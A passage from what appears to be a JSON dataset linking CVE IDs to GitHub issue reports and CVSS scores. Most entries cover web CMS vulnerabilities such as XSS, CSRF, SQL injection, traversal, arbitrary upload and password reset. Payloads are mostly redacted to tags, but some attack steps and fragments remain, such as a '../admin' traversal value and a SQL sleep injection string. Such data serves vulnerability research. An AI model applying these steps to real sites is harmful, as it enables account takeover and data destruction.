  53459. "CVE_ID": "CVE-2020-21228",
  53460. "Issue_Url_old": "https://github.com/Cherry-toto/jizhicms/issues/16",
  53461. "Issue_Url_new": "https://github.com/cherry-toto/jizhicms/issues/16",
  53462. "Repo_new": "cherry-toto/jizhicms",
  53463. "Issue_Created_At": "2020-03-16T03:08:27Z",
  53464. "description": "XSS Stealing cookies. JIZHICMS NUMBERTAG allows XSS to add an administrator cookie. New normal account => New articles FILETAG code: APITAG FILETAG Click on the title to trigger XSS FILETAG",
  53465. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  53466. "severity": "MEDIUM",
  53467. "baseScore": 6.1,
  53468. "impactScore": 2.7,
  53469. "exploitabilityScore": 2.8
  53470. },
  53471. {
  53472. "CVE_ID": "CVE-2020-21238",
  53473. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/5",
  53474. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/5",
  53475. "Repo_new": "chshcms/cscms",
  53476. "Issue_Created_At": "2019-11-15T01:15:46Z",
  53477. "description": "cscms demourl: FILETAG login have APITAG Vulnerability. APITAG NUMBERTAG demourl: FILETAG In the user login box Sign in now without a verification code and prompt that the user does not exist\uff0cwhich makes it easier for remote attackers to hijack accounts via a brute force approach. Capture the packet in burp to truncate the current request the current data packet sent to the intruder module, identification \"username\" used to traverse account information; Select the dictionary for the account name to open the attack FILETAG Successful login account FILETAG This is a prompt password error FILETAG This is the prompt that the account does not exist. FILETAG",
  53478. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  53479. "severity": "CRITICAL",
  53480. "baseScore": 9.8,
  53481. "impactScore": 5.9,
  53482. "exploitabilityScore": 3.9
  53483. },
  53484. {
  53485. "CVE_ID": "CVE-2020-21244",
  53486. "Issue_Url_old": "https://github.com/FrontAccountingERP/FA/issues/40",
  53487. "Issue_Url_new": "https://github.com/frontaccountingerp/fa/issues/40",
  53488. "Repo_new": "frontaccountingerp/fa",
  53489. "Issue_Created_At": "2019-11-12T03:59:14Z",
  53490. "description": "a Directory Traversal vulnerability. test version NUMBERTAG description Frontaccounting is using the function APITAG to eliminate '../' in the file name submitted by the user to avoid directory traversal vulnerability. FILETAG However, some variables do not use the function APITAG in FILETAG , which can cause attackers submit the language package containing the language code of '../'. Affter adding successfully, by deleting it, the attacker can emptied specified folder like the examples. APITAG FILETAG APITAG FILETAG NUMBERTAG Example:empty admin folder NUMBERTAG Before clearing the admin folder FILETAG NUMBERTAG The administrator logs in and creates a new language pack FILETAG FILETAG NUMBERTAG Set the language code to ../admin and save it FILETAG NUMBERTAG Delete the language pack you just created FILETAG NUMBERTAG After deleting successfully, the admin folder will be emptied FILETAG",
  53491. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
  53492. "severity": "MEDIUM",
  53493. "baseScore": 4.9,
  53494. "impactScore": 3.6,
  53495. "exploitabilityScore": 1.2
  53496. },
  53497. {
  53498. "CVE_ID": "CVE-2020-21250",
  53499. "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/22",
  53500. "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/22",
  53501. "Repo_new": "cskaza/cszcms",
  53502. "Issue_Created_At": "2019-11-14T06:26:14Z",
  53503. "description": "Time based blind SQL injection Vulnerability in CSZCMS NUMBERTAG Hi, MENTIONTAG and I found an arbitrary file upload vulnerability in cszcms NUMBERTAG The vulnerable code is on PATHTAG file line NUMBERTAG FILETAG I think using the function \u2018escape string\u2019 can solve the sql injection vulnerability,but you use function 'xss_clean' after APITAG function 'xss_clean' can decode str with function 'rawurldecode',so I can exploit like NUMBERTAG Urlencode the value of UA: Before: User Agent: ' ( if NUMBERTAG sleep NUMBERTAG APITAG After: User Agent: APITAG FILETAG Suggest: Remove function 'xss_clean' here.",
  53504. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  53505. "severity": "CRITICAL",
  53506. "baseScore": 9.8,
  53507. "impactScore": 5.9,
  53508. "exploitabilityScore": 3.9
  53509. },
  53510. {
  53511. "CVE_ID": "CVE-2020-21316",
  53512. "Issue_Url_old": "https://github.com/94fzb/zrlog/issues/56",
  53513. "Issue_Url_new": "https://github.com/94fzb/zrlog/issues/56",
  53514. "Repo_new": "94fzb/zrlog",
  53515. "Issue_Created_At": "2019-10-20T12:20:37Z",
  53516. "description": "\u524d\u53f0\u6587\u7ae0\u8bc4\u8bba\u5904\u5b58\u50a8\u578bXSS. APITAG FILETAG FILETAG",
  53517. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  53518. "severity": "MEDIUM",
  53519. "baseScore": 6.1,
  53520. "impactScore": 2.7,
  53521. "exploitabilityScore": 2.8
  53522. },
  53523. {
  53524. "CVE_ID": "CVE-2020-21321",
  53525. "Issue_Url_old": "https://github.com/emlog/emlog/issues/50",
  53526. "Issue_Url_new": "https://github.com/emlog/emlog/issues/50",
  53527. "Repo_new": "emlog/emlog",
  53528. "Issue_Created_At": "2019-10-22T07:54:16Z",
  53529. "description": "Using CSRF to construct arbitrary links. url\uff1a URLTAG poc \uff1a APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG describe\uff1a Under this link, you can add any link to the website. If someone accidentally clicks on the link, they will jump to the link, find a URL where XSS exists, and you can directly hit a cookie, or blackproduce can construct a black chain. FILETAG FILETAG FILETAG",
  53530. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
  53531. "severity": "MEDIUM",
  53532. "baseScore": 4.3,
  53533. "impactScore": 1.4,
  53534. "exploitabilityScore": 2.8
  53535. },
  53536. {
  53537. "CVE_ID": "CVE-2020-21322",
  53538. "Issue_Url_old": "https://github.com/liufee/cms/issues/44",
  53539. "Issue_Url_new": "https://github.com/liufee/cms/issues/44",
  53540. "Repo_new": "liufee/cms",
  53541. "Issue_Created_At": "2019-11-06T05:26:30Z",
  53542. "description": "File upload command execution. In the background, you can upload the PHP file by changing the image suffix to PHP, resulting in command execution. url\uff1a URLTAG FILETAG FILETAG FILETAG",
  53543. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  53544. "severity": "CRITICAL",
  53545. "baseScore": 9.8,
  53546. "impactScore": 5.9,
  53547. "exploitabilityScore": 3.9
  53548. },
  53549. {
  53550. "CVE_ID": "CVE-2020-21333",
  53551. "Issue_Url_old": "https://github.com/sanluan/PublicCMS/issues/27",
  53552. "Issue_Url_new": "https://github.com/sanluan/publiccms/issues/27",
  53553. "Repo_new": "sanluan/publiccms",
  53554. "Issue_Created_At": "2019-11-19T11:31:53Z",
  53555. "description": "Background storage XSS. Background storage XSS step1\uff1a FILETAG Submit case FILETAG step2\uff1a Administrator review submit case trigger xss FILETAG Click to trigger xss FILETAG",
  53556. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  53557. "severity": "MEDIUM",
  53558. "baseScore": 5.4,
  53559. "impactScore": 2.7,
  53560. "exploitabilityScore": 2.3
  53561. },
  53562. {
  53563. "CVE_ID": "CVE-2020-21342",
  53564. "Issue_Url_old": "https://github.com/Ksharp12138/zzcms/issues/1",
  53565. "Issue_Url_new": "https://github.com/l7o-0/zzcms_vulnerability/issues/1",
  53566. "Repo_new": "l7o-0/zzcms_vulnerability",
  53567. "Issue_Created_At": "2019-11-20T03:46:34Z",
  53568. "description": "Reset any user password. link: FILETAG FILETAG Edition: zzcms NUMBERTAG data NUMBERTAG FILETAG NUMBERTAG ulnerability FILETAG There is found password by controlloing action and username NUMBERTAG Control action and password We can see first ==> set action NUMBERTAG second ==> set password,passwordtrue field so set json ==> APITAG NUMBERTAG payload Payload is as follows, add post: APITAG An attacker can query registered users through the registration interface Reset the user password without authentication FILETAG NUMBERTAG Exp it There is zzcms register user FILETAG Crawl registration request FILETAG add payload in post request FILETAG FILETAG FILETAG Confirm that the user password in the database has been changed FILETAG FILETAG You can use this password to log in to the user's personal center FILETAG But in my tests, I found that if you create a new user and you have to wait a while or restart your database, the same should happen if you change a user's password",
  53569. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  53570. "severity": "HIGH",
  53571. "baseScore": 7.5,
  53572. "impactScore": 3.6,
  53573. "exploitabilityScore": 3.9
  53574. },
  53575. {
  53576. "CVE_ID": "CVE-2020-21345",
  53577. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/336",
  53578. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/336",
  53579. "Repo_new": "halo-dev/halo",
  53580. "Issue_Created_At": "2019-10-15T13:56:16Z",
  53581. "description": "\u540e\u53f0\u6dfb\u52a0\u6587\u7ae0XSS\uff0c\u4e0a\u4f20\u5934\u50cf\u5904\u53ef\u4ee5\u4e0a\u4f20\u4efb\u610f\u6587\u4ef6. APITAG \u6211\u786e\u5b9a\u6211\u5df2\u7ecf\u67e5\u770b\u4e86 (\u6807\u6ce8 APITAG \u4e3a APITAG ) x] APITAG \u4f7f\u7528\u6587\u6863 URLTAG FILETAG x] APITAG Wiki \u5e38\u89c1\u95ee\u9898 URLTAG x] [\u5176\u4ed6 Issues URLTAG \u6211\u8981\u7533\u8bf7 (\u6807\u6ce8 APITAG \u4e3a APITAG ) FILETAG FILETAG PATHTAG FILETAG FILETAG",
  53582. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  53583. "severity": "MEDIUM",
  53584. "baseScore": 6.1,
  53585. "impactScore": 2.7,
  53586. "exploitabilityScore": 2.8
  53587. },
  53588. {
  53589. "CVE_ID": "CVE-2020-21353",
  53590. "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1319",
  53591. "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1319",
  53592. "Repo_new": "getsimplecms/getsimplecms",
  53593. "Issue_Created_At": "2019-11-20T07:09:52Z",
  53594. "description": "Storage XSS in FILETAG . APITAG Payload: '\"> APITAG At Snippets, click on ADD SNIPPEN and edit Snippets to XSS. FILETAG Click Save Snippets to save and refresh the starting XSS FILETAG",
  53595. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  53596. "severity": "MEDIUM",
  53597. "baseScore": 5.4,
  53598. "impactScore": 2.7,
  53599. "exploitabilityScore": 2.3
  53600. },
  53601. {
  53602. "CVE_ID": "CVE-2020-21356",
  53603. "Issue_Url_old": "https://github.com/PopojiCMS/PopojiCMS/issues/23",
  53604. "Issue_Url_new": "https://github.com/popojicms/popojicms/issues/23",
  53605. "Repo_new": "popojicms/popojicms",
  53606. "Issue_Created_At": "2019-11-22T02:49:52Z",
  53607. "description": "Host path leak in FILETAG . version NUMBERTAG poc:delete name=\"file\"; Normal upload file FILETAG Deleting \"name =\" file \";\" will cause host physical path disclosure FILETAG",
  53608. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  53609. "severity": "MEDIUM",
  53610. "baseScore": 5.3,
  53611. "impactScore": 1.4,
  53612. "exploitabilityScore": 3.9
  53613. },
  53614. {
  53615. "CVE_ID": "CVE-2020-21357",
  53616. "Issue_Url_old": "https://github.com/PopojiCMS/PopojiCMS/issues/24",
  53617. "Issue_Url_new": "https://github.com/popojicms/popojicms/issues/24",
  53618. "Repo_new": "popojicms/popojicms",
  53619. "Issue_Created_At": "2019-11-22T06:05:31Z",
  53620. "description": "Storage XSS in Tambah Pengguna. version NUMBERTAG APITAG APITAG EMAILTAG The mailbox is written as XSS malicious code when a new user is added FILETAG Click Edit to view user information in pengguna after adding users FILETAG XSS triggered successfully FILETAG",
  53621. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  53622. "severity": "MEDIUM",
  53623. "baseScore": 6.1,
  53624. "impactScore": 2.7,
  53625. "exploitabilityScore": 2.8
  53626. },
  53627. {
  53628. "CVE_ID": "CVE-2020-21358",
  53629. "Issue_Url_old": "https://github.com/WXiangQian/wage-cms/issues/1",
  53630. "Issue_Url_new": "https://github.com/wxiangqian/wage-cms/issues/1",
  53631. "Repo_new": "wxiangqian/wage-cms",
  53632. "Issue_Created_At": "2019-11-25T09:33:40Z",
  53633. "description": "CSRF in /admin/users. Version NUMBERTAG dev CSRF vulnerability in employee management Before CSRF FILETAG Click APITAG and edit employee information FILETAG Grab the packet and construct the payload of CSRF, and save it as FILETAG FILETAG Visit FILETAG and click 'submit request' FILETAG Employee added successfully FILETAG",
  53634. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  53635. "severity": "MEDIUM",
  53636. "baseScore": 6.5,
  53637. "impactScore": 3.6,
  53638. "exploitabilityScore": 2.8
  53639. },
  53640. {
  53641. "CVE_ID": "CVE-2020-21359",
  53642. "Issue_Url_old": "https://github.com/magicblack/maccms10/issues/80",
  53643. "Issue_Url_new": "https://github.com/magicblack/maccms10/issues/80",
  53644. "Repo_new": "magicblack/maccms10",
  53645. "Issue_Created_At": "2019-10-22T13:56:49Z",
  53646. "description": "Remote command execution vulnerability exists in the management backend. In the \"\"\u8d85\u7ea7\u63a7\u5236\u53f0 >\u6a21\u677f >\u6a21\u677f\u7ba1\u7406\"\", Add function can bypass suffix whitelist verification, and upload any file. Like this. FILETAG Then click Save. FILETAG File FILETAG will be successfully created and written to malicious content. Then go to FILETAG to get the webshell. FILETAG",
  53647. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  53648. "severity": "CRITICAL",
  53649. "baseScore": 9.8,
  53650. "impactScore": 5.9,
  53651. "exploitabilityScore": 3.9
  53652. },
  53653. {
  53654. "CVE_ID": "CVE-2020-21362",
  53655. "Issue_Url_old": "https://github.com/magicblack/maccms10/issues/78",
  53656. "Issue_Url_new": "https://github.com/magicblack/maccms10/issues/78",
  53657. "Repo_new": "magicblack/maccms10",
  53658. "Issue_Created_At": "2019-10-22T12:56:42Z",
  53659. "description": "XSS vulnerability exists in the background search function.. When the administrator logged in, open the following link. APITAG FILETAG Can take over the administrator because the value of the cookie is obtained",
  53660. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  53661. "severity": "MEDIUM",
  53662. "baseScore": 5.4,
  53663. "impactScore": 2.7,
  53664. "exploitabilityScore": 2.3
  53665. },
  53666. {
  53667. "CVE_ID": "CVE-2020-21363",
  53668. "Issue_Url_old": "https://github.com/magicblack/maccms10/issues/79",
  53669. "Issue_Url_new": "https://github.com/magicblack/maccms10/issues/79",
  53670. "Repo_new": "magicblack/maccms10",
  53671. "Issue_Created_At": "2019-10-22T13:17:51Z",
  53672. "description": "Any file can be deleted in the background. In the \"\"\u8d85\u7ea7\u63a7\u5236\u53f0 >\u57fa\u7840 >\u9644\u4ef6\u7ba1\u7406\"\", delete function can delete any file, including APITAG After the administrator logged in, open the following link. APITAG File APITAG will be deleted Then visit APITAG This can reinstall the entire site. FILETAG delete APITAG APITAG",
  53673. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
  53674. "severity": "MEDIUM",
  53675. "baseScore": 6.5,
  53676. "impactScore": 5.2,
  53677. "exploitabilityScore": 1.2
  53678. },
  53679. {
  53680. "CVE_ID": "CVE-2020-21386",
  53681. "Issue_Url_old": "https://github.com/magicblack/maccms10/issues/126",
  53682. "Issue_Url_new": "https://github.com/magicblack/maccms10/issues/126",
  53683. "Repo_new": "magicblack/maccms10",
  53684. "Issue_Created_At": "2019-11-25T09:32:04Z",
  53685. "description": "There is a CSRF vulnerability and XSS vulnerability via PATHTAG that can get the administrator's privileges. After the administrator logged in, open the following page,which will add a classification. APITAG add a classification. Insert payload in the \u201ctype_en\u201d. CODETAG Then, the \u201cenglish name\u201d will be modified to \" APITAG \". We can see the result. FILETAG The attacker can use this vulnerability to obtain the administrator's cookie. Then he will get the administrator's privileges!",
  53686. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  53687. "severity": "HIGH",
  53688. "baseScore": 8.8,
  53689. "impactScore": 5.9,
  53690. "exploitabilityScore": 2.8
  53691. },
  53692. {
  53693. "CVE_ID": "CVE-2020-21431",
  53694. "Issue_Url_old": "https://github.com/Neeke/HongCMS/issues/14",
  53695. "Issue_Url_new": "https://github.com/neeke/hongcms/issues/14",
  53696. "Repo_new": "neeke/hongcms",
  53697. "Issue_Created_At": "2019-11-28T08:35:27Z",
  53698. "description": "APITAG NUMBERTAG Arbitrary Files Read and Edit in template/edit APITAG Privilege). APITAG to the backstage as the administrator; APITAG need to access the page\" URLTAG \" FILETAG APITAG the file name you want to edit or read in the URL and access this page. For example: \" FILETAG \". FILETAG APITAG can see that FILETAG has been read and edited.",
  53699. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N",
  53700. "severity": "MEDIUM",
  53701. "baseScore": 6.5,
  53702. "impactScore": 5.2,
  53703. "exploitabilityScore": 1.2
  53704. },
  53705. {
  53706. "CVE_ID": "CVE-2020-21468",
  53707. "Issue_Url_old": "https://github.com/antirez/redis/issues/6633",
  53708. "Issue_Url_new": "https://github.com/redis/redis/issues/6633",
  53709. "Repo_new": "redis/redis",
  53710. "Issue_Created_At": "2019-12-01T01:48:53Z",
  53711. "description": "Unexpected crash. === REDIS BUG REPORT START: Cut & paste starting from here NUMBERTAG M NUMBERTAG No NUMBERTAG Redis APITAG crashed by signal NUMBERTAG M NUMBERTAG No NUMBERTAG Crashed running the instruction at NUMBERTAG d4daa NUMBERTAG e NUMBERTAG M NUMBERTAG No NUMBERTAG Accessing address: (nil NUMBERTAG M NUMBERTAG No NUMBERTAG Failed assertion: <no assertion failed> (<no file NUMBERTAG STACK TRACE EIP: PATHTAG APITAG Backtrace: PATHTAG APITAG PATHTAG APITAG PATHTAG NUMBERTAG fc NUMBERTAG e0f NUMBERTAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG INFO OUTPUT Server APITAG redis_git_sha1:a1b NUMBERTAG redis_git_dirty NUMBERTAG APITAG redis_mode:standalone APITAG NUMBERTAG generic NUMBERTAG arch_bits NUMBERTAG multiplexing_api:epoll atomicvar_api:atomic builtin gcc_version NUMBERTAG process_id NUMBERTAG APITAG tcp_port NUMBERTAG uptime_in_seconds NUMBERTAG uptime_in_days NUMBERTAG hz NUMBERTAG configured_hz NUMBERTAG lru_clock NUMBERTAG PATHTAG config_file: Clients connected_clients NUMBERTAG APITAG APITAG blocked_clients NUMBERTAG tracking_clients NUMBERTAG Memory used_memory NUMBERTAG used_memory_human NUMBERTAG K used_memory_rss NUMBERTAG used_memory_rss_human NUMBERTAG M used_memory_peak NUMBERTAG APITAG used_memory_peak_perc NUMBERTAG used_memory_overhead NUMBERTAG used_memory_startup NUMBERTAG APITAG APITAG allocator_allocated NUMBERTAG allocator_active NUMBERTAG allocator_resident NUMBERTAG APITAG APITAG used_memory_lua NUMBERTAG used_memory_lua_human NUMBERTAG K used_memory_scripts NUMBERTAG used_memory_scripts_human NUMBERTAG B number_of_cached_scripts NUMBERTAG maxmemory NUMBERTAG maxmemory_human NUMBERTAG B maxmemory_policy:noeviction allocator_frag_ratio NUMBERTAG allocator_frag_bytes NUMBERTAG allocator_rss_ratio NUMBERTAG allocator_rss_bytes NUMBERTAG rss_overhead_ratio NUMBERTAG rss_overhead_bytes NUMBERTAG mem_fragmentation_ratio NUMBERTAG APITAG mem_not_counted_for_evict NUMBERTAG mem_replication_backlog NUMBERTAG mem_clients_slaves NUMBERTAG mem_clients_normal NUMBERTAG mem_aof_buffer NUMBERTAG mem_allocator:jemalloc NUMBERTAG active_defrag_running NUMBERTAG lazyfree_pending_objects NUMBERTAG Persistence loading NUMBERTAG rdb_changes_since_last_save NUMBERTAG rdb_bgsave_in_progress NUMBERTAG rdb_last_save_time NUMBERTAG rdb_last_bgsave_status:ok rdb_last_bgsave_time_sec NUMBERTAG rdb_current_bgsave_time_sec NUMBERTAG rdb_last_cow_size NUMBERTAG aof_enabled NUMBERTAG aof_rewrite_in_progress NUMBERTAG aof_rewrite_scheduled NUMBERTAG aof_last_rewrite_time_sec NUMBERTAG aof_current_rewrite_time_sec NUMBERTAG aof_last_bgrewrite_status:ok aof_last_write_status:ok aof_last_cow_size NUMBERTAG module_fork_in_progress NUMBERTAG module_fork_last_cow_size NUMBERTAG Stats APITAG total_commands_processed NUMBERTAG instantaneous_ops_per_sec NUMBERTAG total_net_input_bytes NUMBERTAG total_net_output_bytes NUMBERTAG instantaneous_input_kbps NUMBERTAG APITAG rejected_connections NUMBERTAG sync_full NUMBERTAG sync_partial_ok NUMBERTAG sync_partial_err NUMBERTAG expired_keys NUMBERTAG expired_stale_perc NUMBERTAG APITAG APITAG evicted_keys NUMBERTAG keyspace_hits NUMBERTAG keyspace_misses NUMBERTAG pubsub_channels NUMBERTAG pubsub_patterns NUMBERTAG latest_fork_usec NUMBERTAG migrate_cached_sockets NUMBERTAG slave_expires_tracked_keys NUMBERTAG active_defrag_hits NUMBERTAG active_defrag_misses NUMBERTAG active_defrag_key_hits NUMBERTAG active_defrag_key_misses NUMBERTAG tracking_used_slots NUMBERTAG Replication role:master connected_slaves NUMBERTAG APITAG APITAG master_repl_offset NUMBERTAG second_repl_offset NUMBERTAG repl_backlog_active NUMBERTAG repl_backlog_size NUMBERTAG APITAG repl_backlog_histlen NUMBERTAG CPU APITAG APITAG APITAG APITAG Modules Commandstats APITAG Cluster cluster_enabled NUMBERTAG Keyspace APITAG CLIENT LIST OUTPUT REGISTERS NUMBERTAG M NUMBERTAG No NUMBERTAG RA NUMBERTAG RB NUMBERTAG fc NUMBERTAG d NUMBERTAG RC NUMBERTAG d4daaa NUMBERTAG c0 RD NUMBERTAG d4dacfdb NUMBERTAG RDI NUMBERTAG fc NUMBERTAG eca NUMBERTAG RSI NUMBERTAG RBP NUMBERTAG fc NUMBERTAG eca NUMBERTAG RSP NUMBERTAG fff5c0d1c NUMBERTAG R NUMBERTAG R NUMBERTAG R NUMBERTAG eb R NUMBERTAG eb R NUMBERTAG R NUMBERTAG d4dacfa NUMBERTAG R NUMBERTAG fff5c0d1dac R NUMBERTAG RIP NUMBERTAG d4daa NUMBERTAG e9 EFL NUMBERTAG CSGSFS NUMBERTAG b NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c5f NUMBERTAG c NUMBERTAG fde NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c5e NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c5d NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c5c NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c5b NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c5a NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c NUMBERTAG e NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c NUMBERTAG e NUMBERTAG e NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c NUMBERTAG d4da NUMBERTAG c6f NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c NUMBERTAG fff5c0d1dac NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c NUMBERTAG d4dacfa NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c NUMBERTAG fff5c0d1c NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c NUMBERTAG fc NUMBERTAG d NUMBERTAG c NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c NUMBERTAG fc NUMBERTAG d NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c NUMBERTAG c NUMBERTAG fde NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c NUMBERTAG d4dacfa NUMBERTAG MODULES INFO OUTPUT FAST MEMORY TEST NUMBERTAG M NUMBERTAG No NUMBERTAG Bio thread for job type NUMBERTAG terminated NUMBERTAG M NUMBERTAG No NUMBERTAG Bio thread for job type NUMBERTAG terminated NUMBERTAG M NUMBERTAG No NUMBERTAG Bio thread for job type NUMBERTAG terminated Preparing to test memory region NUMBERTAG d4dace NUMBERTAG bytes) Preparing to test memory region NUMBERTAG d4db8e NUMBERTAG bytes) Preparing to test memory region NUMBERTAG fc NUMBERTAG aa2c NUMBERTAG bytes) Preparing to test memory region NUMBERTAG fc NUMBERTAG b NUMBERTAG d NUMBERTAG bytes) Preparing to test memory region NUMBERTAG fc NUMBERTAG ba2e NUMBERTAG bytes) Preparing to test memory region NUMBERTAG fc NUMBERTAG c NUMBERTAG f NUMBERTAG bytes) Preparing to test memory region NUMBERTAG fc NUMBERTAG d NUMBERTAG bytes) Preparing to test memory region NUMBERTAG fc NUMBERTAG e0da NUMBERTAG bytes) Preparing to test memory region NUMBERTAG fc NUMBERTAG e2f NUMBERTAG bytes) Preparing to test memory region NUMBERTAG fc NUMBERTAG eca NUMBERTAG bytes) Preparing to test memory region NUMBERTAG fc NUMBERTAG ecd NUMBERTAG bytes) .O.O.O.O.O.O.O.O.O.O.O Fast memory test PASSED, however your memory can still be broken. Please run a memory test for several hours if possible. DUMPING CODE AROUND EIP Symbol: je_large_dalloc (base NUMBERTAG d4daa NUMBERTAG c0) Module: PATHTAG NUMBERTAG base NUMBERTAG d4da NUMBERTAG d r p /tmp/dump.hex /tmp/dump.bin $ objdump adjust vma NUMBERTAG d4daa NUMBERTAG c0 D b binary m i NUMBERTAG tmp/dump.bin NUMBERTAG M NUMBERTAG No NUMBERTAG dump of function (hexdump of NUMBERTAG bytes): APITAG Function at NUMBERTAG d4daa NUMBERTAG f0 is APITAG Function at NUMBERTAG d4daa NUMBERTAG f NUMBERTAG is je_arena_extents_dirty_dalloc === REDIS BUG REPORT END. Make sure to include from START to END. === version information ERRORTAG",
  53712. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  53713. "severity": "HIGH",
  53714. "baseScore": 7.5,
  53715. "impactScore": 3.6,
  53716. "exploitabilityScore": 3.9
  53717. },
  53718. {
  53719. "CVE_ID": "CVE-2020-21493",
  53720. "Issue_Url_old": "https://github.com/wanghaiwei/xiuno-docker/issues/3",
  53721. "Issue_Url_new": "https://github.com/rayfalling/xiuno-docker/issues/3",
  53722. "Repo_new": "rayfalling/xiuno-docker",
  53723. "Issue_Created_At": "2019-12-05T15:07:20Z",
  53724. "description": "User Name Enumeration Vulnerability. FILETAG line NUMBERTAG CODETAG Know the username by traversing the login parameter value email=...& POC: CODETAG Response CODETAG",
  53725. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  53726. "severity": "MEDIUM",
  53727. "baseScore": 5.3,
  53728. "impactScore": 1.4,
  53729. "exploitabilityScore": 3.9
  53730. },
  53731. {
  53732. "CVE_ID": "CVE-2020-21494",
  53733. "Issue_Url_old": "https://github.com/wanghaiwei/xiuno-docker/issues/4",
  53734. "Issue_Url_new": "https://github.com/rayfalling/xiuno-docker/issues/4",
  53735. "Repo_new": "rayfalling/xiuno-docker",
  53736. "Issue_Created_At": "2019-12-07T00:18:13Z",
  53737. "description": "Storage Cross Site Scripting Attack (XSS) Vulnerability. URL\uff1a FILETAG FILETAG line NUMBERTAG CODETAG FILETAG line NUMBERTAG ERRORTAG FILETAG line NUMBERTAG CODETAG FILETAG line NUMBERTAG APITAG The doctype defaults to NUMBERTAG The data packet is modified to APITAG xss payload can be triggered. POC: CODETAG FILETAG FILETAG FILETAG \u5b58\u50a8\u8de8\u7ad9\u811a\u672c\u653b\u51fb\uff08XSS\uff09\u6f0f\u6d1e URL\uff1a FILETAG FILETAG NUMBERTAG CODETAG FILETAG NUMBERTAG ERRORTAG FILETAG NUMBERTAG CODETAG FILETAG NUMBERTAG APITAG doctype NUMBERTAG APITAG payload. POC: CODETAG",
  53738. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  53739. "severity": "MEDIUM",
  53740. "baseScore": 6.1,
  53741. "impactScore": 2.7,
  53742. "exploitabilityScore": 2.8
  53743. },
  53744. {
  53745. "CVE_ID": "CVE-2020-21495",
  53746. "Issue_Url_old": "https://github.com/wanghaiwei/xiuno-docker/issues/5",
  53747. "Issue_Url_new": "https://github.com/rayfalling/xiuno-docker/issues/5",
  53748. "Repo_new": "rayfalling/xiuno-docker",
  53749. "Issue_Created_At": "2019-12-07T01:01:39Z",
  53750. "description": "Storage Cross Site Scripting Attack (XSS) Vulnerability . /admin/?setting base.htm sitename sitebrief PATHTAG line NUMBERTAG APITAG PATHTAG line NUMBERTAG ERRORTAG FILETAG line NUMBERTAG APITAG PATHTAG line NUMBERTAG ERRORTAG FILETAG line NUMBERTAG APITAG FILETAG line NUMBERTAG CODETAG poc: ERRORTAG FILETAG FILETAG FILETAG",
  53751. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  53752. "severity": "MEDIUM",
  53753. "baseScore": 6.1,
  53754. "impactScore": 2.7,
  53755. "exploitabilityScore": 2.8
  53756. },
  53757. {
  53758. "CVE_ID": "CVE-2020-21503",
